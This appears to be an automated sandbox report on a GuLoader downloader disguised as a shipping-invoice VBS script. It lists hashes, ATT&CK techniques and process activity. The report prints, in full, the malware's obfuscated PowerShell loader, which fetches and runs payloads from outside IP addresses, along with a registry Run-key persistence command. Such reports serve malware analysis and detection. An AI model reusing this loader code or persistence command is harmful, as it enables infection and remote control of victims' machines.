guloader | 814c44267d5b05f72b1d8a0a2f9d165515d109383cf9061688c59bc59709f57f

Reason

Machine shutdown

General

Target

doc_awb_shipping_invoice_17_04_2024_000000000000024.vbs
Size

403KB
MD5

d8e8da20535c7928e416af72d69cc817
SHA1

2e6151a12a6ecafdb2943166e1c11417eeebcf7f
SHA256

814c44267d5b05f72b1d8a0a2f9d165515d109383cf9061688c59bc59709f57f
SHA512

47b603258dc07d8ebf809d29071c634f15670bd95d52c7968cfcc064087ff94ff0896a725cfb94b335e55bddd622d711341a542d4ca10b8d6cc127f0d7b13cdd
SSDEEP

6144:ltrc0iH9QXg0Im+aUGFvWtBVkmFtNqsgBt8FD3PG7BXMVbc:lFidQ0lBzzTc

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 2 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

4 2888 WScript.exe
51 4608 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Control Panel\International\Geo\Nation WScript.exe

flow	pid	process
4	2888	WScript.exe
51	4608	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Homothety37 = "%Udredelsen% -w 1 $Potencies=(Get-ItemProperty -Path 'HKCU:\\Iberegningens\\').prakke;%Udredelsen% ($Potencies)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

4504 wab.exe
4504 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

4504 wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4564 reg.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

4608 powershell.exe
4608 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4608 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

4504 wab.exe

pid	process
4504	wab.exe
4504	wab.exe

pid	process
4504	wab.exe

pid	process
4564	reg.exe

pid	process
4608	powershell.exe
4608	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4608	powershell.exe

pid	process
4504	wab.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

WScript.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 2888 wrote to memory of 4608	2888	WScript.exe	powershell.exe
PID 2888 wrote to memory of 4608	2888	WScript.exe	powershell.exe
PID 4608 wrote to memory of 3800	4608	powershell.exe	cmd.exe
PID 4608 wrote to memory of 3800	4608	powershell.exe	cmd.exe
PID 4608 wrote to memory of 2100	4608	powershell.exe	powershell.exe
PID 4608 wrote to memory of 2100	4608	powershell.exe	powershell.exe
PID 4608 wrote to memory of 2100	4608	powershell.exe	powershell.exe
PID 4504 wrote to memory of 852	4504	wab.exe	cmd.exe
PID 4504 wrote to memory of 852	4504	wab.exe	cmd.exe
PID 4504 wrote to memory of 852	4504	wab.exe	cmd.exe
PID 852 wrote to memory of 4564	852	cmd.exe	reg.exe
PID 852 wrote to memory of 4564	852	cmd.exe	reg.exe
PID 852 wrote to memory of 4564	852	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\doc_awb_shipping_invoice_17_04_2024_000000000000024.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Shunners = 1;$Zonernes='Substrin';$Zonernes+='g';Function Bjrgningerne($Uldspindet){$Sauteringers187=$Uldspindet.Length-$Shunners;For($Mouthing=2; $Mouthing -lt $Sauteringers187; $Mouthing+=(3)){$Sommerferier+=$Uldspindet.$Zonernes.Invoke($Mouthing, $Shunners);}$Sommerferier;}function Embulk($Arctician166){. ($Harmonize) ($Arctician166);}$stationsby=Bjrgningerne 'peMSjoPezT.iK lCul a P/ P5He.B.0Hy L.( .WAfi.an.td.no,owbesR, ANWeTIn St1No0Th. 0 e; , ,WH,i QnCl6J.4 C; . Sx,a6R.4 t;H. Jor ivH,:B.1O.2Ss1fa.sw0G,)B, KuGine Sc Rkcio.i/Ac2No0Ca1,a0 ,0M 1U 0Dd1,n MeFP.iStrPeeBefHuo exHe/Co1wi2Ef1.s. ,0 S ';$Solvarmes=Bjrgningerne '.aUSys De.crLi-AuAMegM,em n VtMo ';$Ordrebehandlingerne=Bjrgningerne 'BohOvtVotV pda: u/No/C,9 ,4S..Co1Ar5ho6Un.un7,n9Ap.,a6.e4 S/P UP d .eexm UiB,lH.jL,eSttRassn. IpGafSam C> ,hBrtOctRepEf:C,/re/ ,1Bu9Ho3 u.B.2.l2Mo2F .Af9,i6C..K,1 d4 G9,v/SkU dC eN m iUnlEkjFreMet.nsb..I.p.ef hmSa ';$Stallage=Bjrgningerne ' a>Br ';$Harmonize=Bjrgningerne 'GiiHje.hxHe ';$Bygsukkerne = Bjrgningerne 'PueRvc .hUnoB L.% na.up,ap.xd.faNetEda D%Op\SlISkns,dS,t RaSigS nCoiHenBug eeJorCh.LeE .nTueme F.&.q& e a.e.ec Ah.eo.r Op$Je ';Embulk (Bjrgningerne 'Pa$SigGrlM oUnb UaMel C:MaSR,hPeoDescoh eo BnKseDra Vn =P,(ugcPampldGe .o/Guc,a Nu$SpBCoyV,g sNruCek Pk ,eMarTenUde ) B ');Embulk (Bjrgningerne 'Ne$.egR l HoMobSeaOvlGo:XeT ,a.olGeeVas,upHor eoSpgFrsRopser SgPieSntIns M= S$VeO orAndTrr.aePab ,eDehUna,ynStdPrlEliKnnungPje hrPen .eSu. sOspFll IiEjtF (fr$ S t,ia Yl ClU,aCogLieIs)Fi ');$Ordrebehandlingerne=$Talesprogsprgets[0];Embulk (Bjrgningerne 'Bu$ CgVilP.o ,b RaUnl A: .S ,kSti LbGrst,dSkrS.eC,n BgpheMisD,=UnNC e .wS.-N,OPrbThj eRac Ct,v PSN,y,asUdt reNemLa. ,NSie.ytFu.ChW.ieDobKaCFol iP.eSknBatBr ');Embulk (Bjrgningerne 'Un$R.SOmk ,iSjbLes odPorBue PnA gChe esUd.gaHAde.aaF dHoeBerPrs,r[.o$,nSBoohyl uv oa ,r ,mbaeSpsVe] =Hv$BlsAstBeaHat,eiProMen usB,bBry D ');$Atriummet=Bjrgningerne 'T,SVakBii RbFys id ,rMeeJ.na g.te MsFd.BeD .okow.hnB,lE.oAla dCaFS iBrlSue.p(Lo$.uOZirUndAnr ae Sb ,eSkh Ca BnR d.ol Si Sn .gSqeVirChnh.eBe,Xo$BuNUno dnMulAzi,omfoiM,tA,aDetCriUroBinBa)De ';$Atriummet=$Shoshonean[1]+$Atriummet;$Nonlimitation=$Shoshonean[0];Embulk (Bjrgningerne 'Po$T,g Ml To VbR.a.alT.:GrG,ioDud PsBie FkSls ,pPreTrdHei TtPrr.ae.frVin.eeJus ,=Op( .TB.e Ns tE.-HoPTeaVotDih o Sm$SeNOuok.nUnlA.iFom li st HaextN.iHeoJonKa)Op ');while (!$Godsekspeditrernes) {Embulk (Bjrgningerne ' ,$F gUllReo Pb Wa.elTr:KiMena AdovotanV.nSvaE.eScr .n .eT =Ud$BrtTer euKie.r ') ;Embulk $Atriummet;Embulk (Bjrgningerne 'SmS Bt GaZirFot C-DoS .lu.eKoe .pOv ,o4Fo ');Embulk (Bjrgningerne 'Fa$ Rg,alL,oArb pastlGa: GS,oG.d SsHyeUpk ,sLdp e,ldAgiW.t.nrA e .r Hn yeFasLa=Co(,tTSaeRes UtA.-RaP uaPlt ShVo Su$BeN RoP.n .lMoi FmFsiGetP.a atDoiFloManKa)Be ') ;Embulk (Bjrgningerne 'A,$LygO.lYeoKubEuaPolCe: GPValBeaRenOflAcgApnNoi Pn .gAfs rFra faSidK eFrt p=Me$Ung lB.oenbRoaKol u:BaASan Ga LlPsyZys aE tBlo,orT sSp+ S+En%Ra$HjTHjaClluaeunsFrpNor,eoHag ,sSyp BrA g GeBlt.osTa.PicMuoM.uFin,utUs ') ;$Ordrebehandlingerne=$Talesprogsprgets[$Planlgningsraadet];}Embulk (Bjrgningerne '.a$.egvolFaoGeb UaPilF.:BeBCru OnMidFlhReoFllU,dAc Ra=K UnG ,ePrtB -TaCEroSkn StOpe,unTrt D Sa$saNReo.in elCoi ,mS i ,t.na LtBai,mo DnHd ');Embulk (Bjrgningerne 'Si$Spg,elB oP.bBiaOplIm:,hW Aa Rr ,sf,tKllLai .nU gB, A=R. I.[CaSK.y .sBetNeeInm .G CSko TnChvPoe .r jtUn]Fr:sk: rFS r eoHemEuBOtaSasUle m6Ad4.kS atSur PiFonMag i(In$StBCru .nRedPeh,uoNal ad.e)Re ');Embulk (Bjrgningerne ',n$V,g ,lRvoB b Va AlTe: CK .r,aiS,b .lS.epasH m,=,r Di[drS Ny ds,rtE,eBemBo.KlTNoeIsx ctKu. aE an Ac Kotudn.iAin IgFl]Km:.a:CaAKoSEvCT.IGiIel.viG veRetH,ST,t Pr BiE ny g,u(Bl$FdW a ar rsLotKalHyiNonreg k) ');Embulk (Bjrgningerne ' m$OrgCalFroAxbAvaStlO :G,a Jd ,rAfeDas,ksvaer lKoi anStiUneRenElsOp=.t$,yK srUdiSibmil,ye nsA..CusUnuR,bVesSptCarPriR nDegEp(Ac3St2Ch9De6Om6in6Vi,Fr2De6 ,2Pu0 F6 .).e ');Embulk $adresseliniens;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4608

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indtagninger.Ene && echo $"
3⤵
PID:3800

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shunners = 1;$Zonernes='Substrin';$Zonernes+='g';Function Bjrgningerne($Uldspindet){$Sauteringers187=$Uldspindet.Length-$Shunners;For($Mouthing=2; $Mouthing -lt $Sauteringers187; $Mouthing+=(3)){$Sommerferier+=$Uldspindet.$Zonernes.Invoke($Mouthing, $Shunners);}$Sommerferier;}function Embulk($Arctician166){. ($Harmonize) ($Arctician166);}$stationsby=Bjrgningerne 'peMSjoPezT.iK lCul a P/ P5He.B.0Hy L.( .WAfi.an.td.no,owbesR, ANWeTIn St1No0Th. 0 e; , ,WH,i QnCl6J.4 C; . Sx,a6R.4 t;H. Jor ivH,:B.1O.2Ss1fa.sw0G,)B, KuGine Sc Rkcio.i/Ac2No0Ca1,a0 ,0M 1U 0Dd1,n MeFP.iStrPeeBefHuo exHe/Co1wi2Ef1.s. ,0 S ';$Solvarmes=Bjrgningerne '.aUSys De.crLi-AuAMegM,em n VtMo ';$Ordrebehandlingerne=Bjrgningerne 'BohOvtVotV pda: u/No/C,9 ,4S..Co1Ar5ho6Un.un7,n9Ap.,a6.e4 S/P UP d .eexm UiB,lH.jL,eSttRassn. IpGafSam C> ,hBrtOctRepEf:C,/re/ ,1Bu9Ho3 u.B.2.l2Mo2F .Af9,i6C..K,1 d4 G9,v/SkU dC eN m iUnlEkjFreMet.nsb..I.p.ef hmSa ';$Stallage=Bjrgningerne ' a>Br ';$Harmonize=Bjrgningerne 'GiiHje.hxHe ';$Bygsukkerne = Bjrgningerne 'PueRvc .hUnoB L.% na.up,ap.xd.faNetEda D%Op\SlISkns,dS,t RaSigS nCoiHenBug eeJorCh.LeE .nTueme F.&.q& e a.e.ec Ah.eo.r Op$Je ';Embulk (Bjrgningerne 'Pa$SigGrlM oUnb UaMel C:MaSR,hPeoDescoh eo BnKseDra Vn =P,(ugcPampldGe .o/Guc,a Nu$SpBCoyV,g sNruCek Pk ,eMarTenUde ) B ');Embulk (Bjrgningerne 'Ne$.egR l HoMobSeaOvlGo:XeT ,a.olGeeVas,upHor eoSpgFrsRopser SgPieSntIns M= S$VeO orAndTrr.aePab ,eDehUna,ynStdPrlEliKnnungPje hrPen .eSu. sOspFll IiEjtF (fr$ S t,ia Yl ClU,aCogLieIs)Fi ');$Ordrebehandlingerne=$Talesprogsprgets[0];Embulk (Bjrgningerne 'Bu$ CgVilP.o ,b RaUnl A: .S ,kSti LbGrst,dSkrS.eC,n BgpheMisD,=UnNC e .wS.-N,OPrbThj eRac Ct,v PSN,y,asUdt reNemLa. ,NSie.ytFu.ChW.ieDobKaCFol iP.eSknBatBr ');Embulk (Bjrgningerne 'Un$R.SOmk ,iSjbLes odPorBue PnA gChe esUd.gaHAde.aaF dHoeBerPrs,r[.o$,nSBoohyl uv oa ,r ,mbaeSpsVe] =Hv$BlsAstBeaHat,eiProMen usB,bBry D ');$Atriummet=Bjrgningerne 'T,SVakBii RbFys id ,rMeeJ.na g.te MsFd.BeD .okow.hnB,lE.oAla dCaFS iBrlSue.p(Lo$.uOZirUndAnr ae Sb ,eSkh Ca BnR d.ol Si Sn .gSqeVirChnh.eBe,Xo$BuNUno dnMulAzi,omfoiM,tA,aDetCriUroBinBa)De ';$Atriummet=$Shoshonean[1]+$Atriummet;$Nonlimitation=$Shoshonean[0];Embulk (Bjrgningerne 'Po$T,g Ml To VbR.a.alT.:GrG,ioDud PsBie FkSls ,pPreTrdHei TtPrr.ae.frVin.eeJus ,=Op( .TB.e Ns tE.-HoPTeaVotDih o Sm$SeNOuok.nUnlA.iFom li st HaextN.iHeoJonKa)Op ');while (!$Godsekspeditrernes) {Embulk (Bjrgningerne ' ,$F gUllReo Pb Wa.elTr:KiMena AdovotanV.nSvaE.eScr .n .eT =Ud$BrtTer euKie.r ') ;Embulk $Atriummet;Embulk (Bjrgningerne 'SmS Bt GaZirFot C-DoS .lu.eKoe .pOv ,o4Fo ');Embulk (Bjrgningerne 'Fa$ Rg,alL,oArb pastlGa: GS,oG.d SsHyeUpk ,sLdp e,ldAgiW.t.nrA e .r Hn yeFasLa=Co(,tTSaeRes UtA.-RaP uaPlt ShVo Su$BeN RoP.n .lMoi FmFsiGetP.a atDoiFloManKa)Be ') ;Embulk (Bjrgningerne 'A,$LygO.lYeoKubEuaPolCe: GPValBeaRenOflAcgApnNoi Pn .gAfs rFra faSidK eFrt p=Me$Ung lB.oenbRoaKol u:BaASan Ga LlPsyZys aE tBlo,orT sSp+ S+En%Ra$HjTHjaClluaeunsFrpNor,eoHag ,sSyp BrA g GeBlt.osTa.PicMuoM.uFin,utUs ') ;$Ordrebehandlingerne=$Talesprogsprgets[$Planlgningsraadet];}Embulk (Bjrgningerne '.a$.egvolFaoGeb UaPilF.:BeBCru OnMidFlhReoFllU,dAc Ra=K UnG ,ePrtB -TaCEroSkn StOpe,unTrt D Sa$saNReo.in elCoi ,mS i ,t.na LtBai,mo DnHd ');Embulk (Bjrgningerne 'Si$Spg,elB oP.bBiaOplIm:,hW Aa Rr ,sf,tKllLai .nU gB, A=R. I.[CaSK.y .sBetNeeInm .G CSko TnChvPoe .r jtUn]Fr:sk: rFS r eoHemEuBOtaSasUle m6Ad4.kS atSur PiFonMag i(In$StBCru .nRedPeh,uoNal ad.e)Re ');Embulk (Bjrgningerne ',n$V,g ,lRvoB b Va AlTe: CK .r,aiS,b .lS.epasH m,=,r Di[drS Ny ds,rtE,eBemBo.KlTNoeIsx ctKu. aE an Ac Kotudn.iAin IgFl]Km:.a:CaAKoSEvCT.IGiIel.viG veRetH,ST,t Pr BiE ny g,u(Bl$FdW a ar rsLotKalHyiNonreg k) ');Embulk (Bjrgningerne ' m$OrgCalFroAxbAvaStlO :G,a Jd ,rAfeDas,ksvaer lKoi anStiUneRenElsOp=.t$,yK srUdiSibmil,ye nsA..CusUnuR,bVesSptCarPriR nDegEp(Ac3St2Ch9De6Om6in6Vi,Fr2De6 ,2Pu0 F6 .).e ');Embulk $adresseliniens;"
3⤵
PID:2100

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indtagninger.Ene && echo $"
4⤵
PID:4140

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4504

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Homothety37" /t REG_EXPAND_SZ /d "%Udredelsen% -w 1 $Potencies=(Get-ItemProperty -Path 'HKCU:\Iberegningens\').prakke;%Udredelsen% ($Potencies)"
5⤵
- Suspicious use of WriteProcessMemory
PID:852

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Homothety37" /t REG_EXPAND_SZ /d "%Udredelsen% -w 1 $Potencies=(Get-ItemProperty -Path 'HKCU:\Iberegningens\').prakke;%Udredelsen% ($Potencies)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:4564

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qnta1hur.303.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4504-68-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-62-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-38-0x0000000077511000-0x0000000077631000-memory.dmp

Filesize
1.1MB

Download
memory/4504-41-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-104-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-69-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-103-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-102-0x0000000077511000-0x0000000077631000-memory.dmp

Filesize
1.1MB

Download
memory/4504-101-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-42-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-39-0x0000000001C60000-0x000000000726E000-memory.dmp

Filesize
86.1MB

Download
memory/4504-43-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-45-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-70-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-52-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-54-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-55-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-58-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-99-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-98-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-97-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-96-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-95-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-60-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-61-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-71-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-63-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-64-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-65-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-66-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-67-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-36-0x0000000077511000-0x0000000077631000-memory.dmp

Filesize
1.1MB

Download
memory/4504-94-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-48-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-37-0x0000000077598000-0x0000000077599000-memory.dmp

Filesize
4KB

Download
memory/4504-72-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-73-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-74-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-75-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-76-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-77-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-78-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-79-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-80-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-81-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-82-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-85-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-86-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-87-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-88-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-89-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-90-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-91-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-92-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4504-93-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/4608-12-0x00007FFD37D30000-0x00007FFD387F1000-memory.dmp

Filesize
10.8MB

Download
memory/4608-59-0x00007FFD37D30000-0x00007FFD387F1000-memory.dmp

Filesize
10.8MB

Download
memory/4608-35-0x00000131761C0000-0x00000131761D0000-memory.dmp

Filesize
64KB

Download
memory/4608-26-0x00000131761C0000-0x00000131761D0000-memory.dmp

Filesize
64KB

Download
memory/4608-27-0x00000131761C0000-0x00000131761D0000-memory.dmp

Filesize
64KB

Download
memory/4608-25-0x00007FFD37D30000-0x00007FFD387F1000-memory.dmp

Filesize
10.8MB

Download
memory/4608-17-0x00000131761C0000-0x00000131761D0000-memory.dmp

Filesize
64KB

Download
memory/4608-14-0x00000131761C0000-0x00000131761D0000-memory.dmp

Filesize
64KB

Download
memory/4608-13-0x00000131761C0000-0x00000131761D0000-memory.dmp

Filesize
64KB

Download
memory/4608-7-0x0000013176190000-0x00000131761B2000-memory.dmp

Filesize
136KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads